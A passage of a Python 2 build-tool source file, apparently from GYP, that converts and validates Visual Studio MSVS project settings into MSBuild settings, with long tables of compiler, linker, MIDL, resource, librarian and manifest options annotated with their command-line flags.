msbuild_tool_validators['PreprocessSuppressLineNumbers'] = msbuild_validator
_msvs_to_msbuild_converters[tool.msvs_name][msvs_name] = _Translate
fix_vc_macro_slashes_regex_list = ('IntDir', 'OutDir')
fix_vc_macro_slashes_regex = re.compile(
r'(\$\((?:%s)\))(?:[\\/]+)' % "|".join(fix_vc_macro_slashes_regex_list)
)
# Regular expression to detect keys that were generated by exclusion lists
_EXCLUDED_SUFFIX_RE = re.compile('^(.*)_excluded$')
def _ValidateExclusionSetting(setting, settings, error_msg, stderr=sys.stderr):
"""Verify that 'setting' is valid if it is generated from an exclusion list.
If the setting appears to be generated from an exclusion list, the root name
is checked.
Args:
setting: A string that is the setting name to validate
settings: A dictionary where the keys are valid settings
error_msg: The message to emit in the event of error
stderr: The stream receiving the error messages.
"""
# This may be unrecognized because it's an exclusion list. If the
# setting name has the _excluded suffix, then check the root name.
unrecognized = True
m = re.match(_EXCLUDED_SUFFIX_RE, setting)
if m:
root_setting = m.group(1)
unrecognized = root_setting not in settings
if unrecognized:
# We don't know this setting. Give a warning.
print >> stderr, error_msg
def FixVCMacroSlashes(s):
"""Replace macros which have excessive following slashes.
These macros are known to have a built-in trailing slash. Furthermore, many
scripts hiccup on processing paths with extra slashes in the middle.
This list is probably not exhaustive. Add as needed.
"""
if '$' in s:
s = fix_vc_macro_slashes_regex.sub(r'\1', s)
return s
def ConvertVCMacrosToMSBuild(s):
"""Convert the the MSVS macros found in the string to the MSBuild equivalent.
This list is probably not exhaustive. Add as needed.
"""
if '$' in s:
replace_map = {
'$(ConfigurationName)': '$(Configuration)',
'$(InputDir)': '%(RelativeDir)',
'$(InputExt)': '%(Extension)',
'$(InputFileName)': '%(Filename)%(Extension)',
'$(InputName)': '%(Filename)',
'$(InputPath)': '%(Identity)',
'$(ParentName)': '$(ProjectFileName)',
'$(PlatformName)': '$(Platform)',
'$(SafeInputName)': '%(Filename)',
}
for old, new in replace_map.iteritems():
s = s.replace(old, new)
s = FixVCMacroSlashes(s)
return s
def ConvertToMSBuildSettings(msvs_settings, stderr=sys.stderr):
"""Converts MSVS settings (VS2008 and earlier) to MSBuild settings (VS2010+).
Args:
msvs_settings: A dictionary. The key is the tool name. The values are
themselves dictionaries of settings and their values.
stderr: The stream receiving the error messages.
Returns:
A dictionary of MSBuild settings. The key is either the MSBuild tool name
or the empty string (for the global settings). The values are themselves
dictionaries of settings and their values.
"""
msbuild_settings = {}
for msvs_tool_name, msvs_tool_settings in msvs_settings.iteritems():
if msvs_tool_name in _msvs_to_msbuild_converters:
msvs_tool = _msvs_to_msbuild_converters[msvs_tool_name]
for msvs_setting, msvs_value in msvs_tool_settings.iteritems():
if msvs_setting in msvs_tool:
# Invoke the translation function.
try:
msvs_tool[msvs_setting](msvs_value, msbuild_settings)
except ValueError, e:
print >> stderr, ('Warning: while converting %s/%s to MSBuild, '
'%s' % (msvs_tool_name, msvs_setting, e))
else:
_ValidateExclusionSetting(msvs_setting,
msvs_tool,
('Warning: unrecognized setting %s/%s '
'while converting to MSBuild.' %
(msvs_tool_name, msvs_setting)),
stderr)
else:
print >> stderr, ('Warning: unrecognized tool %s while converting to '
'MSBuild.' % msvs_tool_name)
return msbuild_settings
def ValidateMSVSSettings(settings, stderr=sys.stderr):
"""Validates that the names of the settings are valid for MSVS.
Args:
settings: A dictionary. The key is the tool name. The values are
themselves dictionaries of settings and their values.
stderr: The stream receiving the error messages.
"""
_ValidateSettings(_msvs_validators, settings, stderr)
def ValidateMSBuildSettings(settings, stderr=sys.stderr):
"""Validates that the names of the settings are valid for MSBuild.
Args:
settings: A dictionary. The key is the tool name. The values are
themselves dictionaries of settings and their values.
stderr: The stream receiving the error messages.
"""
_ValidateSettings(_msbuild_validators, settings, stderr)
def _ValidateSettings(validators, settings, stderr):
"""Validates that the settings are valid for MSBuild or MSVS.
We currently only validate the names of the settings, not their values.
Args:
validators: A dictionary of tools and their validators.
settings: A dictionary. The key is the tool name. The values are
themselves dictionaries of settings and their values.
stderr: The stream receiving the error messages.
"""
for tool_name in settings:
if tool_name in validators:
tool_validators = validators[tool_name]
for setting, value in settings[tool_name].iteritems():
if setting in tool_validators:
try:
tool_validators[setting](value)
except ValueError, e:
print >> stderr, ('Warning: for %s/%s, %s' %
(tool_name, setting, e))
else:
_ValidateExclusionSetting(setting,
tool_validators,
('Warning: unrecognized setting %s/%s' %
(tool_name, setting)),
stderr)
else:
print >> stderr, ('Warning: unrecognized tool %s' % tool_name)
# MSVS and MBuild names of the tools.
_compile = _Tool('VCCLCompilerTool', 'ClCompile')
_link = _Tool('VCLinkerTool', 'Link')
_midl = _Tool('VCMIDLTool', 'Midl')
_rc = _Tool('VCResourceCompilerTool', 'ResourceCompile')
_lib = _Tool('VCLibrarianTool', 'Lib')
_manifest = _Tool('VCManifestTool', 'Manifest')
_masm = _Tool('MASM', 'MASM')
_AddTool(_compile)
_AddTool(_link)
_AddTool(_midl)
_AddTool(_rc)
_AddTool(_lib)
_AddTool(_manifest)
_AddTool(_masm)
# Add sections only found in the MSBuild settings.
_msbuild_validators[''] = {}
_msbuild_validators['ProjectReference'] = {}
_msbuild_validators['ManifestResourceCompile'] = {}
# Descriptions of the compiler options, i.e. VCCLCompilerTool in MSVS and
# ClCompile in MSBuild.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\cl.xml" for
# the schema of the MSBuild ClCompile settings.
# Options that have the same name in MSVS and MSBuild
_Same(_compile, 'AdditionalIncludeDirectories', _folder_list) # /I
_Same(_compile, 'AdditionalOptions', _string_list)
_Same(_compile, 'AdditionalUsingDirectories', _folder_list) # /AI
_Same(_compile, 'AssemblerListingLocation', _file_name) # /Fa
_Same(_compile, 'BrowseInformationFile', _file_name)
_Same(_compile, 'BufferSecurityCheck', _boolean) # /GS
_Same(_compile, 'DisableLanguageExtensions', _boolean) # /Za
_Same(_compile, 'DisableSpecificWarnings', _string_list) # /wd
_Same(_compile, 'EnableFiberSafeOptimizations', _boolean) # /GT
_Same(_compile, 'EnablePREfast', _boolean) # /analyze Visible='false'
_Same(_compile, 'ExpandAttributedSource', _boolean) # /Fx
_Same(_compile, 'FloatingPointExceptions', _boolean) # /fp:except
_Same(_compile, 'ForceConformanceInForLoopScope', _boolean) # /Zc:forScope
_Same(_compile, 'ForcedIncludeFiles', _file_list) # /FI
_Same(_compile, 'ForcedUsingFiles', _file_list) # /FU
_Same(_compile, 'GenerateXMLDocumentationFiles', _boolean) # /doc
_Same(_compile, 'IgnoreStandardIncludePath', _boolean) # /X
_Same(_compile, 'MinimalRebuild', _boolean) # /Gm
_Same(_compile, 'OmitDefaultLibName', _boolean) # /Zl
_Same(_compile, 'OmitFramePointers', _boolean) # /Oy
_Same(_compile, 'PreprocessorDefinitions', _string_list) # /D
_Same(_compile, 'ProgramDataBaseFileName', _file_name) # /Fd
_Same(_compile, 'RuntimeTypeInfo', _boolean) # /GR
_Same(_compile, 'ShowIncludes', _boolean) # /showIncludes
_Same(_compile, 'SmallerTypeCheck', _boolean) # /RTCc
_Same(_compile, 'StringPooling', _boolean) # /GF
_Same(_compile, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_compile, 'TreatWChar_tAsBuiltInType', _boolean) # /Zc:wchar_t
_Same(_compile, 'UndefineAllPreprocessorDefinitions', _boolean) # /u
_Same(_compile, 'UndefinePreprocessorDefinitions', _string_list) # /U
_Same(_compile, 'UseFullPaths', _boolean) # /FC
_Same(_compile, 'WholeProgramOptimization', _boolean) # /GL
_Same(_compile, 'XMLDocumentationFileName', _file_name)
_Same(_compile, 'AssemblerOutput',
_Enumeration(['NoListing',
'AssemblyCode', # /FA
'All', # /FAcs
'AssemblyAndMachineCode', # /FAc
'AssemblyAndSourceCode'])) # /FAs
_Same(_compile, 'BasicRuntimeChecks',
_Enumeration(['Default',
'StackFrameRuntimeCheck', # /RTCs
'UninitializedLocalUsageCheck', # /RTCu
'EnableFastChecks'])) # /RTC1
_Same(_compile, 'BrowseInformation',
_Enumeration(['false',
'true', # /FR
'true'])) # /Fr
_Same(_compile, 'CallingConvention',
_Enumeration(['Cdecl', # /Gd
'FastCall', # /Gr
'StdCall', # /Gz
'VectorCall'])) # /Gv
_Same(_compile, 'CompileAs',
_Enumeration(['Default',
'CompileAsC', # /TC
'CompileAsCpp'])) # /TP
_Same(_compile, 'DebugInformationFormat',
_Enumeration(['', # Disabled
'OldStyle', # /Z7
None,
'ProgramDatabase', # /Zi
'EditAndContinue'])) # /ZI
_Same(_compile, 'EnableEnhancedInstructionSet',
_Enumeration(['NotSet',
'StreamingSIMDExtensions', # /arch:SSE
'StreamingSIMDExtensions2', # /arch:SSE2
'AdvancedVectorExtensions', # /arch:AVX (vs2012+)
'NoExtensions', # /arch:IA32 (vs2012+)
# This one only exists in the new msbuild format.
'AdvancedVectorExtensions2', # /arch:AVX2 (vs2013r2+)
]))
_Same(_compile, 'ErrorReporting',
_Enumeration(['None', # /errorReport:none
'Prompt', # /errorReport:prompt
'Queue'], # /errorReport:queue
new=['Send'])) # /errorReport:send"
_Same(_compile, 'ExceptionHandling',
_Enumeration(['false',
'Sync', # /EHsc
'Async'], # /EHa
new=['SyncCThrow'])) # /EHs
_Same(_compile, 'FavorSizeOrSpeed',
_Enumeration(['Neither',
'Speed', # /Ot
'Size'])) # /Os
_Same(_compile, 'FloatingPointModel',
_Enumeration(['Precise', # /fp:precise
'Strict', # /fp:strict
'Fast'])) # /fp:fast
_Same(_compile, 'InlineFunctionExpansion',
_Enumeration(['Default',
'OnlyExplicitInline', # /Ob1
'AnySuitable'], # /Ob2
new=['Disabled'])) # /Ob0
_Same(_compile, 'Optimization',
_Enumeration(['Disabled', # /Od
'MinSpace', # /O1
'MaxSpeed', # /O2
'Full'])) # /Ox
_Same(_compile, 'RuntimeLibrary',
_Enumeration(['MultiThreaded', # /MT
'MultiThreadedDebug', # /MTd
'MultiThreadedDLL', # /MD
'MultiThreadedDebugDLL'])) # /MDd
_Same(_compile, 'StructMemberAlignment',
_Enumeration(['Default',
'1Byte', # /Zp1
'2Bytes', # /Zp2
'4Bytes', # /Zp4
'8Bytes', # /Zp8
'16Bytes'])) # /Zp16
_Same(_compile, 'WarningLevel',
_Enumeration(['TurnOffAllWarnings', # /W0
'Level1', # /W1
'Level2', # /W2
'Level3', # /W3
'Level4'], # /W4
new=['EnableAllWarnings'])) # /Wall
# Options found in MSVS that have been renamed in MSBuild.
_Renamed(_compile, 'EnableFunctionLevelLinking', 'FunctionLevelLinking',
_boolean) # /Gy
_Renamed(_compile, 'EnableIntrinsicFunctions', 'IntrinsicFunctions',
_boolean) # /Oi
_Renamed(_compile, 'KeepComments', 'PreprocessKeepComments', _boolean) # /C
_Renamed(_compile, 'ObjectFile', 'ObjectFileName', _file_name) # /Fo
_Renamed(_compile, 'OpenMP', 'OpenMPSupport', _boolean) # /openmp
_Renamed(_compile, 'PrecompiledHeaderThrough', 'PrecompiledHeaderFile',
_file_name) # Used with /Yc and /Yu
_Renamed(_compile, 'PrecompiledHeaderFile', 'PrecompiledHeaderOutputFile',
_file_name) # /Fp
_Renamed(_compile, 'UsePrecompiledHeader', 'PrecompiledHeader',
_Enumeration(['NotUsing', # VS recognized '' for this value too.
'Create', # /Yc
'Use'])) # /Yu
_Renamed(_compile, 'WarnAsError', 'TreatWarningAsError', _boolean) # /WX
_ConvertedToAdditionalOption(_compile, 'DefaultCharIsUnsigned', '/J')
# MSVS options not found in MSBuild.
_MSVSOnly(_compile, 'Detect64BitPortabilityProblems', _boolean)
_MSVSOnly(_compile, 'UseUnicodeResponseFiles', _boolean)
# MSBuild options not found in MSVS.
_MSBuildOnly(_compile, 'BuildingInIDE', _boolean)
_MSBuildOnly(_compile, 'CompileAsManaged',
_Enumeration([], new=['false',
'true'])) # /clr
_MSBuildOnly(_compile, 'CreateHotpatchableImage', _boolean) # /hotpatch
_MSBuildOnly(_compile, 'MultiProcessorCompilation', _boolean) # /MP
_MSBuildOnly(_compile, 'PreprocessOutputPath', _string) # /Fi
_MSBuildOnly(_compile, 'ProcessorNumber', _integer) # the number of processors
_MSBuildOnly(_compile, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_compile, 'TreatSpecificWarningsAsErrors', _string_list) # /we
_MSBuildOnly(_compile, 'UseUnicodeForAssemblerListing', _boolean) # /FAu
# Defines a setting that needs very customized processing
_CustomGeneratePreprocessedFile(_compile, 'GeneratePreprocessedFile')
# Directives for converting MSVS VCLinkerTool to MSBuild Link.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\link.xml" for
# the schema of the MSBuild Link settings.
# Options that have the same name in MSVS and MSBuild
_Same(_link, 'AdditionalDependencies', _file_list)
_Same(_link, 'AdditionalLibraryDirectories', _folder_list) # /LIBPATH
# /MANIFESTDEPENDENCY:
_Same(_link, 'AdditionalManifestDependencies', _file_list)
_Same(_link, 'AdditionalOptions', _string_list)
_Same(_link, 'AddModuleNamesToAssembly', _file_list) # /ASSEMBLYMODULE
_Same(_link, 'AllowIsolation', _boolean) # /ALLOWISOLATION
_Same(_link, 'AssemblyLinkResource', _file_list) # /ASSEMBLYLINKRESOURCE
_Same(_link, 'BaseAddress', _string) # /BASE
_Same(_link, 'CLRUnmanagedCodeCheck', _boolean) # /CLRUNMANAGEDCODECHECK
_Same(_link, 'DelayLoadDLLs', _file_list) # /DELAYLOAD
_Same(_link, 'DelaySign', _boolean) # /DELAYSIGN
_Same(_link, 'EmbedManagedResourceFile', _file_list) # /ASSEMBLYRESOURCE
_Same(_link, 'EnableUAC', _boolean) # /MANIFESTUAC
_Same(_link, 'EntryPointSymbol', _string) # /ENTRY
_Same(_link, 'ForceSymbolReferences', _file_list) # /INCLUDE
_Same(_link, 'FunctionOrder', _file_name) # /ORDER
_Same(_link, 'GenerateDebugInformation', _boolean) # /DEBUG
_Same(_link, 'GenerateMapFile', _boolean) # /MAP
_Same(_link, 'HeapCommitSize', _string)
_Same(_link, 'HeapReserveSize', _string) # /HEAP
_Same(_link, 'IgnoreAllDefaultLibraries', _boolean) # /NODEFAULTLIB
_Same(_link, 'IgnoreEmbeddedIDL', _boolean) # /IGNOREIDL
_Same(_link, 'ImportLibrary', _file_name) # /IMPLIB
_Same(_link, 'KeyContainer', _file_name) # /KEYCONTAINER
_Same(_link, 'KeyFile', _file_name) # /KEYFILE
_Same(_link, 'ManifestFile', _file_name) # /ManifestFile
_Same(_link, 'MapExports', _boolean) # /MAPINFO:EXPORTS
_Same(_link, 'MapFileName', _file_name)
_Same(_link, 'MergedIDLBaseFileName', _file_name) # /IDLOUT
_Same(_link, 'MergeSections', _string) # /MERGE
_Same(_link, 'MidlCommandFile', _file_name) # /MIDL
_Same(_link, 'ModuleDefinitionFile', _file_name) # /DEF
_Same(_link, 'OutputFile', _file_name) # /OUT
_Same(_link, 'PerUserRedirection', _boolean)
_Same(_link, 'Profile', _boolean) # /PROFILE
_Same(_link, 'ProfileGuidedDatabase', _file_name) # /PGD
_Same(_link, 'ProgramDatabaseFile', _file_name) # /PDB
_Same(_link, 'RegisterOutput', _boolean)
_Same(_link, 'SetChecksum', _boolean) # /RELEASE
_Same(_link, 'StackCommitSize', _string)
_Same(_link, 'StackReserveSize', _string) # /STACK
_Same(_link, 'StripPrivateSymbols', _file_name) # /PDBSTRIPPED
_Same(_link, 'SupportUnloadOfDelayLoadedDLL', _boolean) # /DELAY:UNLOAD
_Same(_link, 'SuppressStartupBanner', _boolean) # /NOLOGO
_Same(_link, 'SwapRunFromCD', _boolean) # /SWAPRUN:CD
_Same(_link, 'TurnOffAssemblyGeneration', _boolean) # /NOASSEMBLY
_Same(_link, 'TypeLibraryFile', _file_name) # /TLBOUT
_Same(_link, 'TypeLibraryResourceID', _integer) # /TLBID
_Same(_link, 'UACUIAccess', _boolean) # /uiAccess='true'
_Same(_link, 'Version', _string) # /VERSION
_Same(_link, 'EnableCOMDATFolding', _newly_boolean) # /OPT:ICF
_Same(_link, 'FixedBaseAddress', _newly_boolean) # /FIXED
_Same(_link, 'LargeAddressAware', _newly_boolean) # /LARGEADDRESSAWARE
_Same(_link, 'OptimizeReferences', _newly_boolean) # /OPT:REF
_Same(_link, 'RandomizedBaseAddress', _newly_boolean) # /DYNAMICBASE
_Same(_link, 'TerminalServerAware', _newly_boolean) # /TSAWARE
_subsystem_enumeration = _Enumeration(
['NotSet',
'Console', # /SUBSYSTEM:CONSOLE
'Windows', # /SUBSYSTEM:WINDOWS
'Native', # /SUBSYSTEM:NATIVE
'EFI Application', # /SUBSYSTEM:EFI_APPLICATION
'EFI Boot Service Driver', # /SUBSYSTEM:EFI_BOOT_SERVICE_DRIVER
'EFI ROM', # /SUBSYSTEM:EFI_ROM
'EFI Runtime', # /SUBSYSTEM:EFI_RUNTIME_DRIVER
'WindowsCE'], # /SUBSYSTEM:WINDOWSCE
new=['POSIX']) # /SUBSYSTEM:POSIX
_target_machine_enumeration = _Enumeration(
['NotSet',
'MachineX86', # /MACHINE:X86
None,
'MachineARM', # /MACHINE:ARM
'MachineEBC', # /MACHINE:EBC
'MachineIA64', # /MACHINE:IA64
None,
'MachineMIPS', # /MACHINE:MIPS
'MachineMIPS16', # /MACHINE:MIPS16
'MachineMIPSFPU', # /MACHINE:MIPSFPU
'MachineMIPSFPU16', # /MACHINE:MIPSFPU16
None,
None,
None,
'MachineSH4', # /MACHINE:SH4
None,
'MachineTHUMB', # /MACHINE:THUMB
'MachineX64']) # /MACHINE:X64
_Same(_link, 'AssemblyDebug',
_Enumeration(['',
'true', # /ASSEMBLYDEBUG
'false'])) # /ASSEMBLYDEBUG:DISABLE
_Same(_link, 'CLRImageType',
_Enumeration(['Default',
'ForceIJWImage', # /CLRIMAGETYPE:IJW
'ForcePureILImage', # /Switch="CLRIMAGETYPE:PURE
'ForceSafeILImage'])) # /Switch="CLRIMAGETYPE:SAFE
_Same(_link, 'CLRThreadAttribute',
_Enumeration(['DefaultThreadingAttribute', # /CLRTHREADATTRIBUTE:NONE
'MTAThreadingAttribute', # /CLRTHREADATTRIBUTE:MTA
'STAThreadingAttribute'])) # /CLRTHREADATTRIBUTE:STA
_Same(_link, 'DataExecutionPrevention',
_Enumeration(['',
'false', # /NXCOMPAT:NO
'true'])) # /NXCOMPAT
_Same(_link, 'Driver',
_Enumeration(['NotSet',
'Driver', # /Driver
'UpOnly', # /DRIVER:UPONLY
'WDM'])) # /DRIVER:WDM
_Same(_link, 'LinkTimeCodeGeneration',
_Enumeration(['Default',
'UseLinkTimeCodeGeneration', # /LTCG
'PGInstrument', # /LTCG:PGInstrument
'PGOptimization', # /LTCG:PGOptimize
'PGUpdate'])) # /LTCG:PGUpdate
_Same(_link, 'ShowProgress',
_Enumeration(['NotSet',
'LinkVerbose', # /VERBOSE
'LinkVerboseLib'], # /VERBOSE:Lib
new=['LinkVerboseICF', # /VERBOSE:ICF
'LinkVerboseREF', # /VERBOSE:REF
'LinkVerboseSAFESEH', # /VERBOSE:SAFESEH
'LinkVerboseCLR'])) # /VERBOSE:CLR
_Same(_link, 'SubSystem', _subsystem_enumeration)
_Same(_link, 'TargetMachine', _target_machine_enumeration)
_Same(_link, 'UACExecutionLevel',
_Enumeration(['AsInvoker', # /level='asInvoker'
'HighestAvailable', # /level='highestAvailable'
'RequireAdministrator'])) # /level='requireAdministrator'
_Same(_link, 'MinimumRequiredVersion', _string)
_Same(_link, 'TreatLinkerWarningAsErrors', _boolean) # /WX
# Options found in MSVS that have been renamed in MSBuild.
_Renamed(_link, 'ErrorReporting', 'LinkErrorReporting',
_Enumeration(['NoErrorReport', # /ERRORREPORT:NONE
'PromptImmediately', # /ERRORREPORT:PROMPT
'QueueForNextLogin'], # /ERRORREPORT:QUEUE
new=['SendErrorReport'])) # /ERRORREPORT:SEND
_Renamed(_link, 'IgnoreDefaultLibraryNames', 'IgnoreSpecificDefaultLibraries',
_file_list) # /NODEFAULTLIB
_Renamed(_link, 'ResourceOnlyDLL', 'NoEntryPoint', _boolean) # /NOENTRY
_Renamed(_link, 'SwapRunFromNet', 'SwapRunFromNET', _boolean) # /SWAPRUN:NET
_Moved(_link, 'GenerateManifest', '', _boolean)
_Moved(_link, 'IgnoreImportLibrary', '', _boolean)
_Moved(_link, 'LinkIncremental', '', _newly_boolean)
_Moved(_link, 'LinkLibraryDependencies', 'ProjectReference', _boolean)
_Moved(_link, 'UseLibraryDependencyInputs', 'ProjectReference', _boolean)
# MSVS options not found in MSBuild.
_MSVSOnly(_link, 'OptimizeForWindows98', _newly_boolean)
_MSVSOnly(_link, 'UseUnicodeResponseFiles', _boolean)
# MSBuild options not found in MSVS.
_MSBuildOnly(_link, 'BuildingInIDE', _boolean)
_MSBuildOnly(_link, 'ImageHasSafeExceptionHandlers', _boolean) # /SAFESEH
_MSBuildOnly(_link, 'LinkDLL', _boolean) # /DLL Visible='false'
_MSBuildOnly(_link, 'LinkStatus', _boolean) # /LTCG:STATUS
_MSBuildOnly(_link, 'PreventDllBinding', _boolean) # /ALLOWBIND
_MSBuildOnly(_link, 'SupportNobindOfDelayLoadedDLL', _boolean) # /DELAY:NOBIND
_MSBuildOnly(_link, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_link, 'MSDOSStubFileName', _file_name) # /STUB Visible='false'
_MSBuildOnly(_link, 'SectionAlignment', _integer) # /ALIGN
_MSBuildOnly(_link, 'SpecifySectionAttributes', _string) # /SECTION
_MSBuildOnly(_link, 'ForceFileOutput',
_Enumeration([], new=['Enabled', # /FORCE
# /FORCE:MULTIPLE
'MultiplyDefinedSymbolOnly',
'UndefinedSymbolOnly'])) # /FORCE:UNRESOLVED
_MSBuildOnly(_link, 'CreateHotPatchableImage',
_Enumeration([], new=['Enabled', # /FUNCTIONPADMIN
'X86Image', # /FUNCTIONPADMIN:5
'X64Image', # /FUNCTIONPADMIN:6
'ItaniumImage'])) # /FUNCTIONPADMIN:16
_MSBuildOnly(_link, 'CLRSupportLastError',
_Enumeration([], new=['Enabled', # /CLRSupportLastError
'Disabled', # /CLRSupportLastError:NO
# /CLRSupportLastError:SYSTEMDLL
'SystemDlls']))
# Directives for converting VCResourceCompilerTool to ResourceCompile.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\rc.xml" for
# the schema of the MSBuild ResourceCompile settings.
_Same(_rc, 'AdditionalOptions', _string_list)
_Same(_rc, 'AdditionalIncludeDirectories', _folder_list) # /I
_Same(_rc, 'Culture', _Integer(msbuild_base=16))
_Same(_rc, 'IgnoreStandardIncludePath', _boolean) # /X
_Same(_rc, 'PreprocessorDefinitions', _string_list) # /D
_Same(_rc, 'ResourceOutputFileName', _string) # /fo
_Same(_rc, 'ShowProgress', _boolean) # /v
# There is no UI in VisualStudio 2008 to set the following properties.
# However they are found in CL and other tools. Include them here for
# completeness, as they are very likely to have the same usage pattern.
_Same(_rc, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_rc, 'UndefinePreprocessorDefinitions', _string_list) # /u
# MSBuild options not found in MSVS.
_MSBuildOnly(_rc, 'NullTerminateStrings', _boolean) # /n
_MSBuildOnly(_rc, 'TrackerLogDirectory', _folder_name)
# Directives for converting VCMIDLTool to Midl.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\midl.xml" for
# the schema of the MSBuild Midl settings.
_Same(_midl, 'AdditionalIncludeDirectories', _folder_list) # /I
_Same(_midl, 'AdditionalOptions', _string_list)
_Same(_midl, 'CPreprocessOptions', _string) # /cpp_opt
_Same(_midl, 'ErrorCheckAllocations', _boolean) # /error allocation
_Same(_midl, 'ErrorCheckBounds', _boolean) # /error bounds_check
_Same(_midl, 'ErrorCheckEnumRange', _boolean) # /error enum
_Same(_midl, 'ErrorCheckRefPointers', _boolean) # /error ref
_Same(_midl, 'ErrorCheckStubData', _boolean) # /error stub_data
_Same(_midl, 'GenerateStublessProxies', _boolean) # /Oicf
_Same(_midl, 'GenerateTypeLibrary', _boolean)
_Same(_midl, 'HeaderFileName', _file_name) # /h
_Same(_midl, 'IgnoreStandardIncludePath', _boolean) # /no_def_idir
_Same(_midl, 'InterfaceIdentifierFileName', _file_name) # /iid
_Same(_midl, 'MkTypLibCompatible', _boolean) # /mktyplib203
_Same(_midl, 'OutputDirectory', _string) # /out
_Same(_midl, 'PreprocessorDefinitions', _string_list) # /D
_Same(_midl, 'ProxyFileName', _file_name) # /proxy
_Same(_midl, 'RedirectOutputAndErrors', _file_name) # /o
_Same(_midl, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_midl, 'TypeLibraryName', _file_name) # /tlb
_Same(_midl, 'UndefinePreprocessorDefinitions', _string_list) # /U
_Same(_midl, 'WarnAsError', _boolean) # /WX
_Same(_midl, 'DefaultCharType',
_Enumeration(['Unsigned', # /char unsigned
'Signed', # /char signed
'Ascii'])) # /char ascii7
_Same(_midl, 'TargetEnvironment',
_Enumeration(['NotSet',
'Win32', # /env win32
'Itanium', # /env ia64
'X64'])) # /env x64
_Same(_midl, 'EnableErrorChecks',
_Enumeration(['EnableCustom',
'None', # /error none
'All'])) # /error all
_Same(_midl, 'StructMemberAlignment',
_Enumeration(['NotSet',
'1', # Zp1
'2', # Zp2
'4', # Zp4
'8'])) # Zp8
_Same(_midl, 'WarningLevel',
_Enumeration(['0', # /W0
'1', # /W1
'2', # /W2
'3', # /W3
'4'])) # /W4
_Renamed(_midl, 'DLLDataFileName', 'DllDataFileName', _file_name) # /dlldata
_Renamed(_midl, 'ValidateParameters', 'ValidateAllParameters',
_boolean) # /robust
# MSBuild options not found in MSVS.
_MSBuildOnly(_midl, 'ApplicationConfigurationMode', _boolean) # /app_config
_MSBuildOnly(_midl, 'ClientStubFile', _file_name) # /cstub
_MSBuildOnly(_midl, 'GenerateClientFiles',
_Enumeration([], new=['Stub', # /client stub
'None'])) # /client none
_MSBuildOnly(_midl, 'GenerateServerFiles',
_Enumeration([], new=['Stub', # /client stub
'None'])) # /client none
_MSBuildOnly(_midl, 'LocaleID', _integer) # /lcid DECIMAL
_MSBuildOnly(_midl, 'ServerStubFile', _file_name) # /sstub
_MSBuildOnly(_midl, 'SuppressCompilerWarnings', _boolean) # /no_warn
_MSBuildOnly(_midl, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_midl, 'TypeLibFormat',
_Enumeration([], new=['NewFormat', # /newtlb
'OldFormat'])) # /oldtlb
# Directives for converting VCLibrarianTool to Lib.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\lib.xml" for
# the schema of the MSBuild Lib settings.
_Same(_lib, 'AdditionalDependencies', _file_list)
_Same(_lib, 'AdditionalLibraryDirectories', _folder_list) # /LIBPATH
_Same(_lib, 'AdditionalOptions', _string_list)
_Same(_lib, 'ExportNamedFunctions', _string_list) # /EXPORT
_Same(_lib, 'ForceSymbolReferences', _string) # /INCLUDE
_Same(_lib, 'IgnoreAllDefaultLibraries', _boolean) # /NODEFAULTLIB
_Same(_lib, 'IgnoreSpecificDefaultLibraries', _file_list) # /NODEFAULTLIB
_Same(_lib, 'ModuleDefinitionFile', _file_name) # /DEF
_Same(_lib, 'OutputFile', _file_name) # /OUT
_Same(_lib, 'SuppressStartupBanner', _boolean) # /NOLOGO
_Same(_lib, 'UseUnicodeResponseFiles', _boolean)
_Same(_lib, 'LinkTimeCodeGeneration', _boolean) # /LTCG
_Same(_lib, 'TargetMachine', _target_machine_enumeration)
# TODO(jeanluc) _link defines the same value that gets moved to
# ProjectReference. We may want to validate that they are consistent.
_Moved(_lib, 'LinkLibraryDependencies', 'ProjectReference', _boolean)
_MSBuildOnly(_lib, 'DisplayLibrary', _string) # /LIST Visible='false'
_MSBuildOnly(_lib, 'ErrorReporting',
_Enumeration([], new=['PromptImmediately', # /ERRORREPORT:PROMPT
'QueueForNextLogin', # /ERRORREPORT:QUEUE
'SendErrorReport', # /ERRORREPORT:SEND
'NoErrorReport'])) # /ERRORREPORT:NONE
_MSBuildOnly(_lib, 'MinimumRequiredVersion', _string)
_MSBuildOnly(_lib, 'Name', _file_name) # /NAME
_MSBuildOnly(_lib, 'RemoveObjects', _file_list) # /REMOVE
_MSBuildOnly(_lib, 'SubSystem', _subsystem_enumeration)
_MSBuildOnly(_lib, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_lib, 'TreatLibWarningAsErrors', _boolean) # /WX
_MSBuildOnly(_lib, 'Verbose', _boolean)
# Directives for converting VCManifestTool to Mt.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\mt.xml" for
# the schema of the MSBuild Lib settings.
# Options that have the same name in MSVS and MSBuild
_Same(_manifest, 'AdditionalManifestFiles', _file_list) # /manifest
_Same(_manifest, 'AdditionalOptions', _string_list)
_Same(_manifest, 'AssemblyIdentity', _string) # /identity:
_Same(_manifest, 'ComponentFileName', _file_name) # /dll
_Same(_manifest, 'GenerateCatalogFiles', _boolean) # /makecdfs
_Same(_manifest, 'InputResourceManifests', _string) # /inputresource
_Same(_manifest, 'OutputManifestFile', _file_name) # /out
_Same(_manifest, 'RegistrarScriptFile', _file_name) # /rgs
_Same(_manifest, 'ReplacementsFile', _file_name) # /replacements
_Same(_manifest, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_manifest, 'TypeLibraryFile', _file_name) # /tlb:
_Same(_manifest, 'UpdateFileHashes', _boolean) # /hashupdate
_Same(_manifest, 'UpdateFileHashesSearchPath', _file_name)
_Same(_manifest, 'VerboseOutput', _boolean) # /verbose
# Options that have moved location.
_MovedAndRenamed(_manifest, 'ManifestResourceFile',
'ManifestResourceCompile',
'ResourceOutputFileName',
_file_name)
_Moved(_manifest, 'EmbedManifest', '', _boolean)
# MSVS options not found in MSBuild.
